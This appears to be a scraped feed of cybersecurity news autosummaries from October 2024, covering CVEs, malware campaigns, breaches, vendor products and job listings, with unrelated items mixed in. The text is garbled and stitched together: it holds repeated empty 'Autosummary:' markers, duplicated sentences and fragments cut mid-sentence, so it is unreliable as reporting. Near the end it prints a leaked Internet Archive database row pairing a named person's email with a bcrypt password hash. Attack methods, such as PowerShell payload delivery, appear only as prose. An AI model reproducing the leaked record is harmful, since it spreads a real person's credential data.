“An attacker could bypass SAML single sign-on (SSO) authentication with the optional encrypted assertions feature, allowing unauthorized provisioning of users and access to the instance, by exploiting an improper verification of cryptographic signatures vulnerability in GitHub Enterprise Server. "Autosummary:
Ospina family Frank Ospina took his own life in immigration detention An inquest jury has found "multiple failings" and "missed opportunities" at an immigration detention centre contributed to a Colombian man taking his own life in 2023. Frank Ospina, 39, an engineering graduate, came to the UK in late 2022 to visit his mother, who had settled here, and to visit prospective universities. "Autosummary:
"Autosummary:
Discord, a messaging app largely used by young gamers, has a freemium model – it is free to sign-up, but additional features, including access to games, come with a pricetag.“Our vision, if we get all of this right, is a business and a customer should be able to get things done right in a chat thread,” says Nikila Srinivasan, vice president of business messaging at Meta. "Autosummary:
"In this Help Net Security interview, Ismael Valenzuela, Vice President of Threat Research & Intelligence at BlackBerry, discusses the impact of geopolitical tensions on the frequency and sophistication of cyberattacks. He explains how nation-states and politically motivated groups exploit unrest for strategic advantages, providing examples of recent conflicts and their cyber implications. How do geopolitical tensions directly affect the frequency and sophistication of cyberattacks? Can you give examples of how nation-states or politically motivated groups … More
The post How nation-states exploit political instability to launch cyber operations appeared first on Help Net Security.
"Autosummary:
This would include data surrounding the identification of cyber-criminal activity and tactics, techniques, and procedures (TTPs) which could act as an early warning system for those threat actor targeting supply chains, the monitoring of deep-web forums for intel related to vulnerabilities that affect the supply chain, initial access brokers (IABs) that are offering access to entities within a supply chain, analysis of Geopolitical risks, and the flagging of vulnerabilities within 3rd party of open source software, which is frequently a component of intricate supply chain networks. While the sophistication of these attacks doesn’t always increase, attackers frequently focus on high-value or strategically significant targets, such as governments, diplomatic entities, critical infrastructure, defense sectors, or other key areas.Adopting a defense in depth approach ensures multiple layers of security, while a zero-trust model mandates strict verification for every entity, user, app, service or device accessing resources, limiting the impact of potential mistakes.These threats can arise from various sources, including human error, vulnerabilities in the technology stack, misconfigured devices, insider threats, and other factors that may vary depending on the organization’s specific background or industry.This category includes unintentional mistakes made by employees, such as falling victim to phishing attacks, business email compromise (BEC), misconfiguring devices, and careless handling of sensitive data—such as misplacing documents. "Cyber claims have continued their upwards trend over the past year, driven in large part by a rise in data and privacy breach incidents, according to Allianz. Cyber claims frequency exceeds €1 million The frequency of large cyber claims (>€1 million) in the first six months of 2024 was up 14% while severity increased by 17%, according to the insurer’s claims analysis, following just a 1% increase in severity during 2023. Data and privacy breach-related … More
The post Data breaches trigger increase in cyber insurance claims appeared first on Help Net Security.
"Autosummary:
In discussions with clients, it is critical we understand their data governance standards and how transparent they are when it comes to their use of consumers’ data, who they share it with, and their approach to vendor cyber security,” says Tresa Stephens, Head of Cyber, North America, Allianz Commercial. “AI is also becoming an essential tool in the fight against cyber-attacks, as it can quickly identify a security breach and automatically isolate systems and databases, as well as having the potential to significantly reduce the cost and life cycle of a data breach claim by automating tasks, such as forensics and notifications, potentially saving companies millions of dollars,” concluded Baviskar. "Autosummary:
The shortcoming has been addressed in the following 101 different versions of Jetpack - 13.9.1, 13.8.2, 13.7.1, 13.6.1, 13.5.1, 13.4.4, 13.3.2, 13.2.3, 13.1.4, 13.0.1, 12.9.4, 12.8.2, 12.7.2, 12.6.3, 12.5.1, 12.4.1, 12.3.1, 12.2.2, 12.1.2, 12.0.2, 11.9.3, 11.8.6, 11.7.3, 11.6.2, 11.5.3, 11.4.2, 11.3.4, 11.2.2, 11.1.4, 11.0.2, 10.9.3, 10.8.2, 10.7.2, 10.6.2, 10.5.3, 10.4.2, 10.3.2, 10.2.3, 10.1.2, 10.0.2, 9.9.3, 9.8.3, 9.7.3, 9.6.4, 9.5.5, 9.4.4, 9.3.5, 9.2.4, 9.1.3, 9.0.5, 8.9.4, 8.8.5, 8.7.4, 8.6.4, 8.5.3, 8.4.5, 8.3.3, 8.2.6, 8.1.4, 8.0.3, 7.9.4, 7.8.4, 7.7.6, 7.6.4, 7.5.7, 7.4.5, 7.3.5, 7.2.5, 7.1.5, 7.0.5, 6.9.4, 6.8.5, 6.7.4, 6.6.5, 6.5.4, 6.4.6, 6.3.7, 6.2.5, 6.1.5, 6.0.4, 5.9.4, 5.8.4, 5.7.5, 5.6.5, 5.5.5, 5.4.4, 5.3.4, 5.2.5, 5.1.4, 5.0.3, 4.9.3, 4.8.5, 4.7.4, 4.6.3, 4.5.3, 4.4.5, 4.3.5, 4.2.5, 4.1.4, 4.0.7, 3.9.10 While there is no evidence that the vulnerability has ever been exploited in the wild, there is a likelihood that it could be abused going forward in light of public disclosure. "Autosummary:
HarfangLab said it observed three different versions of the PowerShell script starting mid-September 2024 - A PowerShell script that leverages mshta.exe to execute code hosted on a remote server A remotely-hosted PowerShell script that"s directly executed via the Invoke-Expression cmdlet (aka iex) A PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL The ZIP archive, for its part, includes a genuine executable that"s susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that"s to be loaded instead. "Autosummary:
For example, an NDR solution can detect a Command and Control (C2) channel set up by an intruder using a zero-day exploit by leveraging these key capabilities: first, the solution continuously monitors all network traffic, including metadata such as source and destination IPs, connection times and traffic volumes. Why Traditional Solutions Fail Traditional security solutions such as Security Information and Event Management (SIEM), Intrusion Detection Systems (IDS), and Endpoint Detection and Response (EDR) often struggle against zero-day attacks.If a zero-day exploit is used to infiltrate the network, subsequent C2 communications will often show anomalous behavior such as beaconing, irregular-sized transfers, or specific timing (e.g. "phone home" signals). "Autosummary:
To verify if a security alert is from Google, users can check their Recent security activity: Tap your Gmail profile photo in the top right corner Tap Manage your Google Account Select the Security tab tab You will see something similar to this: Here you can find the Review Security Activity button Any messages claiming to be security alerts from Google that are not listed there will not be from Google. Public service announcement: You should be aware of a pretty elaborate phishing scam using AI voice that claims to be Google Support (caller ID matches, but is not verified) DO NOT CLICK YES ON THIS DIALOG— You will be phished They claim to be checking that you are alive and… pic.twitter.com/60zeuS2lL8 — Garry Tan (@garrytan) October 10, 2024 The scammers claim to be checking that you are alive and whether they should disregard a filed death certificate. "Bitdefender launched Scam Copilot, an advanced technology platform powered by AI and designed to detect and fight scams along with fraud attempts across devices including computers, tablets, and mobile phones. The platform has been integrated into several Bitdefender digital life protection consumer products adding another powerful layer of defense to protect against malware, credential stealing, and data theft. In a report by the Global Anti-Scam Alliance (GASA), global losses from scams amounted to over one … More
The post Bitdefender Scam Copilot detects and combats online scams appeared first on Help Net Security.
"Autosummary:
Key features and benefits include: Full scam and fraud protection – Scam Copilot provides comprehensive protection across digital environments, including web browsing, email (Gmail and Outlook), texting, chat apps (WhatsApp, Facebook Messenger, Telegram, Discord), push notifications, and calendar invites. "Autosummary:
" Another notable aspect is the broad targeting of TrickMo, gathering data from applications spanning multiple categories such as banking, enterprise, job and recruitment, e-commerce, trading, social media, streaming and entertainment, VPN, government, education, telecom, and healthcare. "Autosummary:
"Autosummary:
"Autosummary:
In October 2018, the US-CERT released a joint technical alert from the DHS, the FBI, and the Treasury warning about the ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace). "Autosummary:
In 2020, Nintendo, another co-owner of Pokémon, suffered a data breach, with attackers leaking source code, internal documents, and development tools. "Autosummary:
"We present a list of selected cybersecurity companies that received funding during the third quarter of 2024 (Q3 2024). Apono October | 15.5 million Apono has raised $15.5 million in a Series A funding led by New Era Capital Partners, with participation from Mindset Ventures, Redseed Ventures, Silvertech Ventures, initial seed investors, and more. Chainguard July | $140 million Chainguard has completed a $140 million Series C round of funding led by Redpoint Ventures, Lightspeed … More
The post Breaking down the numbers: Q3 2024 cybersecurity funding activity recap appeared first on Help Net Security.
"Autosummary:
Opnova September | $3.75 million Backed by $3.75 million in pre-seed funding co-led by Faber, ScaleX, and Preface Ventures, Opnova is set to redefine IT operations by addressing the challenges posed by rework—the time spent on repetitive, mundane, yet essential tasks. "Autosummary:
"On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer"s network, "patched" the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable. "Autosummary:
Some of the widely-used third-party commands that could be potential targets for command-jacking comprise npm, pip, git, kubectl, terraform, gcloud, heroku, and dotnet. "Autosummary:
Gorilla Botnet Launches 300,000 DDoS Attacks Across 100 Countries: A botnet malware family called Gorilla issued over 300,000 attack commands in the month of September 2024 alone, targeting universities, government websites, telecoms, banks, gaming, and gambling sectors.OpenAI Disrupts Malicious Operations: OpenAI said it has disrupted over 20 malicious cyber operations since the start of the year that abused its generative artificial intelligence (AI) chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and vulnerability research. OpenAI said it has disrupted over 20 malicious cyber operations since the start of the year that abused its generative artificial intelligence (AI) chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and vulnerability research." Threat actors have found an effective social engineering vector in phone calls in order to trick users into performing an unintended action, a technique also called telephone-oriented attack delivery (TOAD), callback phishing, and hybrid vishing (a combination of voice and phishing).Social Engineering Via Phone Calls: Threat actors have found an effective social engineering vector in phone calls in order to trick users into performing an unintended action, a technique also called telephone-oriented attack delivery (TOAD), callback phishing, and hybrid vishing (a combination of voice and phishing). 📰 Around the Cyber World Microsoft Announces Windows 11 Security Baseline: Microsoft has released the Windows 11, version 24H2 security baseline with added protections to LAN Manager, Kerberos, User Account Control, and Microsoft Defender Antivirus. "Autosummary:
" The disclosure comes as Palo Alto Networks Unit 42 detailed a successor to INC ransomware named Lynx that has been active since July 2024, targeting organizations in retail, real estate, architecture, financial, and environmental services sectors in the U.S. and U.K. The emergence of Lynx is said to have been spurred by the sale of INC ransomware"s source code on the criminal underground market as early as March 2024, prompting malware authors to repackage the locker and spawn new variants. "OneSpan announced an innovation in phishing-resistant transaction security, VISION FX. This new solution combines OneSpan’s patented CRONTO transaction signing with FIDO2 protocols that strengthen protection against phishing and account takeover threats (ATO), setting a standard for banking security. Merging both technologies into a single authentication solution delivers secure and user-friendly option on the market for banking customers logging on to execute transactions. Changes in the banking sector associated with new digital initiatives have ushered in … More
The post OneSpan strenghtens banking security with phishing-resistant authentication appeared first on Help Net Security.
"Autosummary:
As a pioneer in authentication solutions for digital banking, OneSpan’s wide range of user authentication and digital transaction security solutions help customers safeguard digital accounts, secure financial transactions, and fight cybercrime. "Rancher Government Solutions launched Harvester Government, the first fully compliant, out-of-the-box Hyperconverged Infrastructure (HCI) solution tailored specifically for US Government and Military operations. Designed to meet the strict security standards required for government use cases, Harvester Government offers a pre-hardened HCI infrastructure platform that seamlessly combines compliance, security, and flexibility. Harvester Government is derived from the upstream open-source product but reimagined and enhanced to meet the unique operational and security needs of the US Government. … More
The post Rancher Government Solutions introduces Harvester Government appeared first on Help Net Security.
"Autosummary:
“By delivering a solution that is compliant and hardened out-of-the-box, we are enabling government entities to deploy modern IT infrastructure quickly, securely, and with confidence.” "Autosummary:
However, TrickMo"s targeting scope appears broad enough to encompass app types (and accounts) beyond banking, including VPN, streaming platforms, e-commerce platforms, trading, social media, recruitment, and enterprise platforms. "Autosummary:
Once the manipulated message is sent back to the bank"s central systems containing the approval codes (DE38, DE39) and the amount (DE54), the bank approves the transaction, and a money mule acting on behalf of the hackers withdraws the cash from an ATM. "Autosummary:
Job security: Almost all industries require cybersecurity, including health, government, education, law, financial services, and manufacturing – cybersecurity roles aren’t going anywhere. Although internships are typically unpaid, several major players, including CISA, DoD, DHS and IBM, offer paid opportunities, ensuring that students at all stages of their cyber journey can get a foot in the door without undue financial stress.The world needs more cybersecurity professionals – here are three great ways to give you an ‘in’ to the ever-growing and rewarding security industry In a day and age where everything is digital, a data breach or cyberattack can cost any organization dearly, affecting it financially, operationally, legally and reputationally – to the point of possibly jeopardizing its very existence. "Autosummary:
Last week, Ivanti warned of three new security vulnerabilities (CVE-2024-9379, CVE-2024-9380, and CVE-2024-9381) in its Cloud Service Appliance (CSA) that are actively exploited in attacks in the wild. "Autosummary:
Nation-state actor exploited three Ivanti CSA zero-days Pierluigi Paganini October 14, 2024 October 14, 2024 An alleged nation-state actor exploited three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) in recent attacks. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572) For October 2024 Patch Tuesday, Microsoft has released fixes for 117 security vulnerabilities, including two under active exploitation: CVE-2024-43573, a spoofing bug affecting the Windows MSHTML Platform, and CVE-2024-43572, a remote code execution flaw in the Microsoft Management Console (MMC). SOC teams are frustrated with their security tools Security operations … More
The post Week in review: Microsoft fixes two exploited zero-days, SOC teams are losing trust in security tools appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572) For October 2024 Patch Tuesday, Microsoft has released fixes for 117 security vulnerabilities, including two under active exploitation: CVE-2024-43573, a spoofing bug affecting the Windows MSHTML Platform, and CVE-2024-43572, a remote code execution flaw in the Microsoft Management Console (MMC). New infosec products of the week: October 11, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Action1, BreachLock, Commvault, Dashlane, Data Theorem, Edgio, Frontegg, and Qualys. "Autosummary:
"Autosummary:
In these attacks, spotted by Trend Micro researchers, OilRig deployed a novel backdoor, targeting Microsoft Exchange servers to steal credentials, and also exploited the Windows CVE-2024-30088 flaw to elevate their privileges on compromised devices. "Autosummary:
"Autosummary:
"This allowed us to see that the command and control server for this malware is a WAMP (Windows, Apache, MySQL & PHP/Perl/Python) setup and during testing was using the domain stickhero[.]pro." All OpenAI accounts used by the above threat actors were banned, and the associated indicators of compromise, including IP addresses, have been shared with cybersecurity partners.OpenAI has disrupted over 20 malicious cyber operations abusing its AI-powered chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and conducting spear-phishing attacks.LLM-aided development The malware created with the help of OpenAI"s chatbot can steal contact lists, call logs, and files stored on the device, take screenshots, scrutinize the user"s browsing history, and get their precise position. "ESET researchers discovered that the organized scammer network Telekopye has expanded its operations to target users of popular accommodation booking platforms like Booking.com and Airbnb. They have also increased the sophistication of their victim selection and of targeting the two booking sites, where the phishing pages are even more believable than regular online marketplace ones. The Telekopye scammer network Telekopye is a toolkit that operates as a Telegram bot turning online marketplace scams into illicit … More
The post Scammers target Airbnb and Booking.com users appeared first on Help Net Security.
"Autosummary:
In late 2023, after ESET Research had published its two-part series on Telekopye, Czech and Ukrainian police arrested tens of cybercriminals utilizing Telekopye, including the key players, in two joint operations. "Canonical released Ubuntu 24.10 Oracular Oriole, which brings notable advancements, including an updated kernel, new toolchains, and the GNOME 47 desktop environment, along with significant enhancements in software security. “Oracular Oriole sets a new pace for delivering the latest upstream kernel and toolchains,” said Mark Shuttleworth, CEO of Canonical, “Experimental new security features demonstrate our commitment to continually elevate the Linux desktop experience in conversation with the community for the next 20 years and beyond.” … More
The post Ubuntu 24.10 Oracular Oriole brings tighter security controls appeared first on Help Net Security.
"Autosummary:
Expanded toolchain support with versioned Rust and Java TCK Certification Ubuntu 24.10 brings expanded toolchain support, featuring the latest versions of Python, Java, Go, C, C++, Rust, and .Net, with .Net support now extended to the ppc64el architecture. "Autosummary:
" Attacks mounted by APT29 have been categorized as those designed to harvest intelligence and establish persistent access so as to facilitate supply chain compromises (i.e., targets of intent), as well as those that allow them to host malicious infrastructure or conduct follow-on operations from compromised accounts by taking advantage of publicly known flaws, weak credentials, or other misconfigurations (i.e., targets of opportunity). "Autosummary:
"Autosummary:
"Please refrain from spreading this information through social media, etc., as it could increase the damage caused by the leak of information on this case, violate the privacy of those affected, have serious effects on their lives and businesses, and encourage crime," says the updated Casio statement. "Autosummary:
"In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were used instead of unknown, low-star repositories," Cofense researcher Jacob Malimban said. "AI is becoming recognized for its potential to strengthen cybersecurity measures and tackle the skills gap across various sectors. Its ability to streamline data management processes boosts efficiency and strengthens security protocols. However, the rise of GenAI has raised alarms about the effectiveness of traditional data privacy practices, urging a reevaluation of existing strategies. Aaron Fulkerson, CEO of Opaque, discusses how the weaponization of GenAI has made existing data privacy practices (like masking, anonymization, tokenization, … More
The post What lies ahead for AI in cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The Internet Archive has suffered a data breach, leading to the compromise of email addresses, screen names and bcrypt password hashes of some 31 million users. The compromise was revealed on Wednesday afternoon, when the digital library’s website began showing a JavaScript pop-up saying: “Have you ever felt like the Internet Archive runs on sticks and is constantly on the verge of suffering a catastrophic security breach? It just happened. See 31 million of you … More
The post Internet Archive data breach, defacement, and DDoS: Users’ data compromised appeared first on Help Net Security.
"Autosummary:
The Internet Archive is a non-profit organization that provides free access to digitized materials – printed and audiovisual materials, music, podcasts, audio books, images, software – as well as the Wayback Machine, a massive collection of archived copies of web pages. "Adaptiva announces the latest feature release for OneSite Patch: vulnerability dashboards. These new dashboards provide real-time visibility into Common Vulnerabilities and Exposures (CVEs) in the environment and patches that can remediate them–empowering organizations to find and fix vulnerabilities efficiently. IT and security teams often struggle to obtain real-time data that unifies vulnerability discovery and remediation status within the IT environment. This includes understanding how many vulnerabilities have available patches and the deployment status of those … More
The post Adaptiva improves collaboration between IT and security teams with vulnerability dashboards appeared first on Help Net Security.
"Autosummary:
Insights with the new vulnerability dashboards include: Detected CVEs CVEs by Threat Recency CVEs by Exploit Maturity CVEs by Exploit Type CVEs by Vulnerability Age Vulnerable Devices In addition to the vulnerability dashboards, OneSite Patch also includes newly updated patching dashboards for more granular reporting. "Autosummary:
Three days later, the other group responded: "I agree 50/50, you can add your code :)" Then on September 30, the first threat actor replied back, stating "Alright ) so how can I contact you though? "Autosummary:
The stolen database contains authentication information for registered members, including their email addresses, screen names, password change timestamps, Bcrypt-hashed passwords, and other internal data. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
Financial Business and Consumer Solutions (FBCS), a debt collection agency previously used by Comcast, was the subject of a ransomware attack in February 2024, which had a database of names, addresses, social security numbers, dates of birth, and Comcast account details exposed. "ESET released its updated ESET Vulnerability and Patch Management module. With the new update, ESET V&PM has expanded to support Linux1 (desktops and servers), as well as macOS2 devices, covering broader parts of a business’ ecosystem. The V&PM module is also now presented in a new dashboard, improved for greater visibility and transparency, enhancing its ease of use while giving an instant overview of vulnerability and patching status across a network. “We believe that top-level … More
The post ESET updates Vulnerability and Patch Management module appeared first on Help Net Security.
"Autosummary:
"Mozilla has pushed out an emergency update for its Firefox and Firefox ESR browsers to fix a vulnerability (CVE-2024-9680) that is being exploited in the wild. About CVE-2024-9680 Reported by ESET malware researcher Damien Schaeffer, CVE-2024-9680 is a use-after-free vulnerability in the browser’s Animation timelines and, according to Mozilla, has been exploited to achieve code execution in the content process. Additional details about the vulnerability or the attacks are yet to be shared. According to … More
The post Actively exploited Firefox zero-day fixed, update ASAP! (CVE-2024-9680) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The leaked data includes: Confidential documents (社外秘) Legal documents Personal data of employees Confidential NDA"s Employee payroll information Patents information Company financial documents "Autosummary:
"Autosummary:
Weeks later, in late March, Finnish cybersecurity and privacy company WithSecure spotted CVE-2023-27532 exploits deployed in attacks linked to the financially motivated FIN7 threat group, known for its links to the Conti, REvil, Maze, Egregor, and BlackBasta ransomware operations. "Autosummary:
The exposed data included names, email addresses, postal addresses, phone numbers, dates of birth, and loyalty account information. "Autosummary:
Online marketplace scams Always verify the person you are talking with, mainly their history on the platform, age of their account, rating, and location – a location too far away, a fresh account with no history, or a bad rating might be indicators of a scammer. Throughout our tracking of Telekopye, we’ve observed that different Telegram groups implement their own advanced features into the toolkit, aimed at speeding up the scam process, improving communication with targets, protecting phishing websites against disruption by competitors, and other goals. Law enforcement operations In late 2023, after ESET Research had published its two-part series on Telekopye, Czech and Ukrainian police arrested tens of cybercriminals utilizing Telekopye, including the key players, in two joint operations. Telekopye groups have a business-like operation, with a clear hierarchy, defined roles, internal practices – including admission and mentoring processes for newcomers – fixed working hours, and commission payouts for Telekopye administrators.Telekopye is designed to target a large variety of online services in Europe and North America, such as OLX, Vinted, eBay, Wallapop, and others. Neanderthals – members of any Telegram group utilizing Telekopye – gain access to the bot’s UI, which enables simple generation of phishing emails, SMS messages, web pages, and other features. This makes the scam much harder to spot, as the information provided is personally relevant to the victims, arrives via the expected communication channel, and the linked, fake websites look as expected. While our previous research explored the technical and organizational background of Telekopye scams, our latest research describes the scammers’ various efforts to maximize their financial gains – expanding their victim pool, taking advantage of seasonal opportunities, and improving their tools and operations. The page contains prefilled information about a booking, such as the check-in and checkout dates, price, and location. We have described the groups’ various efforts to maximize their financial gains, including expanding their victim pool, taking advantage of seasonal opportunities, and improving their tools and operations. "YARA is a powerful tool designed primarily to aid malware researchers in identifying and categorizing malware samples, though its applications are broader. The tool enables users to create detailed descriptions, or “rules,” for malware families or any other target based on textual or binary patterns. Each rule comprises a collection of strings and a logical expression, forming the criteria for its detection and classification. YARA is a multi-platform tool compatible with Windows, Linux, and macOS. … More
The post YARA: Open-source tool for malware research appeared first on Help Net Security.
"Autosummary:
"Cloud Cybersecurity Analyst III Texas Health and Human Services | USA | Hybrid – View job details As a Cloud CSAIII, you will be responsible for designing, implementing, and managing security solutions for cloud environments. You will ensure that cloud infrastructures are secure, resilient, and compliant with organizational policies and industry regulations. Your role will involve collaborating with various stakeholders to integrate security best practices into cloud solutions, maintaining a robust security posture, and supporting … More
The post Cybersecurity jobs available right now: October 9, 2024 appeared first on Help Net Security.
"Autosummary:
ICT/Cyber Security Engineer Honeywell | Italy | On-site – View job details As an ICT/Cyber Security Engineer, you will contribute to the designing, engineering, configuring, implementing, commissioning, securing and supporting of ICT infrastructure (Server, Storage, Network, Virtual Platforms) and Enterprise Applications at both new and existing client sites. Penetration Tester PepsiCo | USA | Hybrid – View job details As a Penetration Tester, you will conduct penetration tests across Web applications, APIs, mobile applications, infrastructure, cloud environments, and devices. Data Protection Specialist TeamViewer | Germany | Hybrid – View job details As a Data Privacy Specialist, you will play a critical role in ensuring compliance with data protection laws, supporting day-to-day operations and AI-related projects, managing privacy governance, and collaborating with key stakeholders to drive internal compliance and privacy-related improvements across the organization.Drive all phases of penetration tests and red team engagements, including scoping, planning, communications, timelines, and execution of key activities (reconnaissance, vulnerability identification, exploitation, and reporting). Senior Offensive Cyber Security Engineer Astranis Space Technologies | USA | On-site – View job details As a Senior Offensive Cyber Security Engineer, you will conduct penetration testing, vulnerability assessments, and red team exercises across the company’s digital landscape to identify and mitigate potential security threats before they become incidents. "Autosummary:
Five of the vulnerabilities are listed as publicly known at the time of release, with two of them coming under active exploitation as a zero-day - CVE-2024-43572 (CVSS score: 7.8) - Microsoft Management Console Remote Code Execution Vulnerability (Exploitation detected) (CVSS score: 7.8) - Microsoft Management Console Remote Code Execution Vulnerability (Exploitation detected) CVE-2024-43573 (CVSS score: 6.5) - "If you run a self-managed GitLab installation with configured SAML-based authentication and you haven’t upgraded it since mid-September, do it now, because security researchers have published an analysis of CVE-2024-45409 and an exploit script that may help attackers gain access as any user on GitLab. About CVE-2024-45409 GitLab is a popular software development platform that can be deployed by users on on-premises servers, Kubernetes, or with a cloud provider. CVE-2024-45409 is a critical authentication bypass … More
The post Exploit code for critical GitLab auth bypass flaw released (CVE-2024-45409) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
In September, it fixed another known issue affecting Microsoft 365 apps like Outlook, Word, Excel, and OneNote, which triggered crashes when typing or spell-checking a text. "Autosummary:
"We managed to hack into and offload the corporate GitLab server where internal development and projects were stored, the corporate mail server, Confluence, Redmine, Jenkins, Mantis, RocketChat - systems where development was conducted and tasks were discussed," DumpForums said. "Autosummary:
"Autosummary:
A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution CVE-2022-2971 (CVSS score: 8.6) - A type confusion vulnerability in libIEC61850 that could allow an attacker to crash the server with a malicious payload CVE-2022-2972 (CVSS score: 10.0) - A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution CVE-2022-2973 (CVSS score: 8.6) - "Autosummary:
"Autosummary:
9887370, internetarchive@scotthelme.co.uk,$2a$10$Bho2e2ptPnFRJyJKIn5BiehIDiEwhjfMZFVRM9fRCarKXkemA3PxuScottHelme,2020-06-25,2020-06-25,internetarchive@scotthelme.co.uk,2020-06-25 13:22:52.7608520,\N0\N\N@scotthelme\N\N\N Helme confirmed that the bcrypt-hashed password in the data record matched the brcrypt-hashed password stored in his password manager. "Autosummary:
"Autosummary:
"In total, this malware campaign has affected more than 28,000 people, the vast majority of whom are residents of Russia," said Dr. Web. "Significant numbers of infections have also been observed in Belarus, Uzbekistan, Kazakhstan, Ukraine, Kyrgyzstan and Turkey. "Autosummary:
"Autosummary:
Another threat actor that has remained laser-focused on Ukraine is Gamaredon, a Russian hacking crew that"s also known as Aqua Blizzard (previously Actinium), Armageddon, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder. "Autosummary:
"American Water, the largest water and wastewater utility company in the US, has shut down some of its systems following a cyberattack. While the company confirmed that none of its water or wastewater facilities or operations have been negatively affected by the attack, they proactively took their customer portal service (MyWater) offline, and their call center “has limited functionality” while portal is offline. What happened? New Jersey-based American Water is a public utility company with … More
The post American Water shuts down systems after cyberattack appeared first on Help Net Security.
"Autosummary:
"BreachLock strengthens continuous threat exposure management (CTEM) capabilities for enterprise customers with its new Attack Surface Analytics feature. Time is of the essence when Fortune 500 security teams find themselves waking up to a Code Red vulnerability being actively exploited. When CISOs urgently request a detailed list of impacted assets, including those running a specific TLS version, which ports are being used, servers involved, and more, along with a patching strategy, that’s where BreachLock’s new … More
The post BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities appeared first on Help Net Security.
"Autosummary:
The feature provides enterprise users with: All relevant asset intelligence consolidated into a single, consolidated, cumulative view, with details on the correlation between domains, subdomains, IP addresses and ports, and associated technologies. "Autosummary:
" The attack against the South Asian embassy in Belarus is said to have made use of three different malware families, in addition to JackalControl, JackalSteal, and JackalWorm - GoldenDealer , which is used to deliver executables to the air-gapped system via compromised USB drives , which is used to deliver executables to the air-gapped system via compromised USB drives GoldenHowl , a modular backdoor with capabilities to steal files, create scheduled tasks, upload/download files to and from a remote server, and create an SSH tunnel, and , a modular backdoor with capabilities to steal files, create scheduled tasks, upload/download files to and from a remote server, and create an SSH tunnel, and GoldenRobo, a file collector and data exfiltration tool The attacks targeting the unnamed government organization in Europe, on the other hand, have been found to rely on an entirely new set of malware tools mostly written in Go. "Autosummary:
American Water shut down some of its systems following a cyberattack Pierluigi Paganini October 08, 2024 October 08, 2024 American Water, the largest publicly traded water and wastewater utility company in the US, shut down some of its systems following a cyberattack. "OTAVA introduced the OTAVA S.E.C.U.R.E. Score to help businesses further improve their security posture. The S.E.C.U.R.E. Score is a dynamic metric that assesses vulnerabilities, and makes recommendations on how to close security gaps and minimize risk. The S.E.C.U.R.E. acronym stands for Shrink, Examine, Contain, Undo, Recover, and Evaluate – the incremental steps to understanding areas of vulnerability, and how to protect businesses from evolving and escalating cyber threats. “Businesses continue to face increasing threats of … More
The post OTAVA S.E.C.U.R.E. Score simplifies cybersecurity strategy for businesses appeared first on Help Net Security.
"Autosummary:
S.E.C.U.R.E. Score monitors all relevant areas of the cloud services environment, regardless of the vendor, including monitoring, Security Information and Event Management (SIEM), malware solutions, data protection and disaster recovery solutions, patching, and other areas of vulnerability. "An actively exploited zero-day vulnerability (CVE-2024-43047) affecting dozens of Qualcomm’s chipsets has been patched by the American semiconductor giant. About CVE-2024-43047 On Monday, Qualcomm has confirmed patches for 20 vulnerabilities affecting both proprietary and open source software running on its various chipsets. Among those is CVE-2024-43047, a use-after-free vulnerability in the Digital Signal Processor (DSP) service that could lead to “memory corruption while maintaining memory maps of [high level operating system (HLOS)] memory.” The vulnerability’s … More
The post Qualcomm zero-day under targeted exploitation (CVE-2024-43047) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Tag CVE ID CVE Title Severity .NET and Visual Studio CVE-2024-38229 .NET and Visual Studio Remote Code Execution Vulnerability Important .NET and Visual Studio CVE-2024-43485 .NET and Visual Studio Denial of Service Vulnerability Important .NET, .NET Framework, Visual Studio CVE-2024-43484 .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability Important .NET, .NET Framework, Visual Studio CVE-2024-43483 .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability Important Azure CLI CVE-2024-43591 Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability Important Azure Monitor CVE-2024-38097 Azure Monitor Agent Elevation of Privilege Vulnerability Important Azure Stack CVE-2024-38179 Azure Stack Hyperconverged Infrastructure (HCI) Elevation of Privilege Vulnerability Important BranchCache CVE-2024-43506 BranchCache Denial of Service Vulnerability Important BranchCache CVE-2024-38149 BranchCache Denial of Service Vulnerability Important Code Integrity Guard CVE-2024-43585 Code Integrity Guard Security Feature Bypass Vulnerability Important DeepSpeed CVE-2024-43497 DeepSpeed Remote Code Execution Vulnerability Important Internet Small Computer Systems Interface (iSCSI) CVE-2024-43515 Internet Small Computer Systems Interface (iSCSI) Denial of Service Vulnerability Important Microsoft ActiveX CVE-2024-43517 Microsoft ActiveX Data Objects Remote Code Execution Vulnerability Important Microsoft Configuration Manager CVE-2024-43468 Microsoft Configuration Manager Remote Code Execution Vulnerability Critical Microsoft Defender for Endpoint CVE-2024-43614 Microsoft Defender for Endpoint for Linux Spoofing Vulnerability Important Microsoft Edge 